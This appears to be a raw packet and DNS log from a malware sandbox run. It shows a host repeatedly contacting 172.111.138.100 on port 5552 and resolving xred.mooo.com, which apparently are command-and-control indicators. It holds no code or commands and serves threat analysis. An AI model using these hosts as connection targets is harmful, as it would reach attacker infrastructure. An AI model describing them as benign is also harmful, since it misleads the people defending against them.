                                                                                                              Dec 30, 2024 11:25:28.772200108 CET44349760172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.126899004 CET44349754216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.126965046 CET49754443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:29.127674103 CET44349754216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.127717018 CET49754443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:29.136363983 CET49754443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:29.136392117 CET44349754216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.136652946 CET44349754216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.136706114 CET49754443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:29.137618065 CET49754443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:29.183335066 CET44349754216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.241890907 CET44349756216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.241971970 CET49756443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:29.242801905 CET44349756216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.242878914 CET49756443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:29.243098021 CET44349757172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.243153095 CET49757443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:29.246773005 CET49756443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:29.246788025 CET44349756216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.247113943 CET44349756216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.247226000 CET49757443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:29.247226954 CET49756443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:29.247236967 CET44349757172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.248914957 CET49757443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:29.248924017 CET44349757172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.249396086 CET49756443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:29.295331001 CET44349756216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.389806986 CET44349760172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:29.390043020 CET49760443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:29.391509056 CET49760443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.218812943 CET44349778172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.218847036 CET44349773172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.218858004 CET49773443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.218894005 CET49773443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.222732067 CET49773443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.222747087 CET44349773172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.223670006 CET49779443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.223706961 CET44349779172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.223762035 CET49779443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.224673986 CET49779443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.224692106 CET44349779172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.748711109 CET44349776216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.748959064 CET49776443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:32.749526024 CET44349776216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.749883890 CET49776443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:32.753726959 CET44349777216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.753787994 CET49776443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:32.753802061 CET44349776216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.754033089 CET49777443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:32.754151106 CET44349776216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.754477024 CET44349777216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.754550934 CET49777443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:32.754553080 CET49776443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:32.758189917 CET49777443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:32.758198977 CET44349777216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.758199930 CET49776443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:32.758430958 CET44349777216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.758681059 CET49777443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:32.758893967 CET49777443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:32.803330898 CET44349776216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.803338051 CET44349777216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.825942039 CET44349778172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.826327085 CET49778443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.826700926 CET49778443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.826705933 CET44349778172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.826942921 CET49778443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.826948881 CET44349778172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.827606916 CET44349779172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.827792883 CET49779443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.828011036 CET49779443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.828023911 CET44349779172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:32.828151941 CET49779443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:32.828157902 CET44349779172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.126348019 CET44349776216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.126918077 CET44349776216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.128043890 CET44349777216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.128144979 CET49777443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.128158092 CET44349777216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.128238916 CET49776443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.129195929 CET44349777216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.130352020 CET49777443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.138633966 CET49776443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.138633966 CET49776443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.138650894 CET44349776216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.138787031 CET49776443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.158221006 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.158222914 CET49777443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.158250093 CET44349777216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.158267975 CET44349780216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.158370018 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.167414904 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.167443037 CET44349780216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.168860912 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.168895960 CET44349781216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.169985056 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.188904047 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.188919067 CET44349781216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.241847992 CET44349778172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.241899967 CET44349778172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.242001057 CET44349778172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.242029905 CET49778443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.250520945 CET49778443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.383250952 CET44349779172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.383321047 CET44349779172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.383435011 CET44349779172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.383441925 CET49779443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.385987043 CET49779443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.539093971 CET49778443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.539117098 CET44349778172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.540358067 CET49784443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.540394068 CET44349784172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.540460110 CET49784443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.540777922 CET49784443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.540791988 CET44349784172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.543008089 CET49779443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.543049097 CET44349779172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.543627024 CET49785443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.543663979 CET44349785172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.543776989 CET49785443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.593594074 CET49785443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:33.593617916 CET44349785172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.596432924 CET497865552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:33.601258993 CET555249786172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.601325035 CET497865552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:33.601726055 CET497865552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:33.606525898 CET555249786172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.772968054 CET44349780216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.773041964 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.778109074 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.778120995 CET44349780216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.785111904 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.785120964 CET44349780216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.787131071 CET44349781216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.787338972 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.788292885 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.788297892 CET44349781216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:33.790080070 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:33.790083885 CET44349781216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.135694981 CET44349784172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.135839939 CET49784443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:34.136255980 CET49784443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:34.136265039 CET44349784172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.138210058 CET49784443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:34.138237953 CET44349784172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.150144100 CET44349781216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.150213003 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.150229931 CET44349781216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.150646925 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.151278019 CET44349780216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.151480913 CET44349781216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.151490927 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.151525021 CET44349780216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.151536942 CET44349781216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.151541948 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.151562929 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.151595116 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.152352095 CET44349780216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.152406931 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.152406931 CET44349780216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.152448893 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.154870033 CET49781443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.154885054 CET44349781216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.155909061 CET49787443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.155968904 CET44349787216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.156032085 CET49787443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.159394026 CET49787443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.159410000 CET44349787216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.161613941 CET49780443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.161638021 CET44349780216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.162231922 CET49788443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.162277937 CET44349788216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.162350893 CET49788443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.162585020 CET49788443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:34.162606001 CET44349788216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.200397968 CET49785443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:34.240461111 CET49789443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:34.240489960 CET44349789172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.240587950 CET49789443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:34.243104935 CET49789443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:34.243117094 CET44349789172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.543119907 CET44349784172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.543158054 CET44349784172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.543196917 CET49784443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:34.543209076 CET44349784172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.543278933 CET44349784172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:34.543298960 CET49784443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:44.881295919 CET49797443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:44.881302118 CET44349797216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:44.881771088 CET49796443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:44.881783962 CET44349796216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.171963930 CET44349797216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.172143936 CET49797443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:45.172486067 CET44349797216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.172518015 CET44349797216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.172574997 CET49797443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:45.179687977 CET44349796216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.179747105 CET49796443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:45.179780006 CET44349796216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.179826975 CET49796443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:45.180828094 CET44349796216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.180869102 CET44349796216.58.206.46192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.180870056 CET49796443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:45.180907965 CET49796443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:45.197174072 CET44349798172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.197226048 CET44349798172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.197331905 CET44349798172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.197340012 CET49798443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:45.200001955 CET49798443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:45.358469963 CET44349801172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.358546019 CET44349801172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.358681917 CET49801443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:45.358699083 CET44349801172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.358712912 CET44349801172.217.16.193192.168.2.8
                                                                                                              Dec 30, 2024 11:25:45.358743906 CET49801443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:45.358771086 CET49801443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:48.381125927 CET4971480192.168.2.869.42.215.252
                                                                                                              Dec 30, 2024 11:25:48.381692886 CET49796443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:48.381855011 CET49797443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:48.381948948 CET49798443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:48.381954908 CET49801443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:51.657170057 CET498055552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:51.662084103 CET555249805172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:25:51.662247896 CET498055552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:51.662497997 CET498055552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:51.667330027 CET555249805172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:25:53.797981024 CET555249805172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:25:53.798065901 CET498055552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:53.850929976 CET498055552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:53.855967045 CET555249805172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:00.690360069 CET498065552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:00.695188046 CET555249806172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:00.695333958 CET498065552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:00.695939064 CET498065552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:00.700671911 CET555249806172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:02.854943991 CET555249806172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:02.855174065 CET498065552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:02.881859064 CET498065552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:02.886799097 CET555249806172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:09.766726971 CET498085552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:09.771677971 CET555249808172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:09.772080898 CET498085552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:09.772080898 CET498085552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:09.776890993 CET555249808172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:11.906588078 CET555249808172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:11.906826973 CET498085552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:11.944044113 CET498085552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:11.948929071 CET555249808172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:18.829257011 CET498095552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:18.834299088 CET555249809172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:18.834588051 CET498095552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:18.834903955 CET498095552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:18.839776039 CET555249809172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:20.967639923 CET555249809172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:20.967704058 CET498095552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:21.022594929 CET498095552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:21.027604103 CET555249809172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:27.907604933 CET498385552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:27.912463903 CET555249838172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:27.912703991 CET498385552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:27.913134098 CET498385552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:27.918023109 CET555249838172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:30.047203064 CET555249838172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:30.047419071 CET498385552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:30.069552898 CET498385552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:30.074301004 CET555249838172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:36.938879967 CET499035552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:36.943973064 CET555249903172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:36.944083929 CET499035552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:36.944363117 CET499035552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:36.949156046 CET555249903172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:39.072258949 CET555249903172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:39.072348118 CET499035552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:39.133898973 CET499035552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:39.143038034 CET555249903172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:46.009998083 CET499625552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:46.015335083 CET555249962172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:46.015441895 CET499625552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:46.015796900 CET499625552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:46.020641088 CET555249962172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:59.958375931 CET555249962172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:59.958957911 CET499625552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:59.961194992 CET499625552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:59.966053963 CET555249962172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:59.985469103 CET500555552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:59.990384102 CET555250055172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:59.990695000 CET500555552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:59.990973949 CET500555552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:59.995743990 CET555250055172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:02.123583078 CET555250055172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:02.123681068 CET500555552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:27:02.131759882 CET500555552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:27:02.136611938 CET555250055172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:09.017445087 CET500845552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:27:09.022790909 CET555250084172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:09.022912025 CET500845552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:27:09.023215055 CET500845552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:27:09.028021097 CET555250084172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:22.902295113 CET555250084172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:22.902441025 CET500845552192.168.2.8172.111.138.100
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 11:25:20.698101997 CET | 54256 | 53 | 192.168.2.8 | 1.1.1.1
Dec 30, 2024 11:25:20.704998016 CET | 53 | 54256 | 1.1.1.1 | 192.168.2.8
Dec 30, 2024 11:25:21.569252014 CET | 63793 | 53 | 192.168.2.8 | 1.1.1.1
Dec 30, 2024 11:25:21.819281101 CET | 53 | 63793 | 1.1.1.1 | 192.168.2.8
Dec 30, 2024 11:25:21.872697115 CET | 52114 | 53 | 192.168.2.8 | 1.1.1.1
Dec 30, 2024 11:25:21.985191107 CET | 52613 | 53 | 192.168.2.8 | 1.1.1.1
Dec 30, 2024 11:25:21.985778093 CET | 53 | 52114 | 1.1.1.1 | 192.168.2.8
Dec 30, 2024 11:25:21.991914988 CET | 53 | 52613 | 1.1.1.1 | 192.168.2.8
Dec 30, 2024 11:25:28.658093929 CET | 50145 | 53 | 192.168.2.8 | 1.1.1.1
Dec 30, 2024 11:25:28.665427923 CET | 53 | 50145 | 1.1.1.1 | 192.168.2.8
Dec 30, 2024 11:25:35.471853971 CET | 63695 | 53 | 192.168.2.8 | 1.1.1.1
Dec 30, 2024 11:25:35.479656935 CET | 53 | 63695 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 11:25:20.698101997 CET | 192.168.2.8 | 1.1.1.1 | 0x679b | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:21.569252014 CET | 192.168.2.8 | 1.1.1.1 | 0x470e | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:21.872697115 CET | 192.168.2.8 | 1.1.1.1 | 0x91a4 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
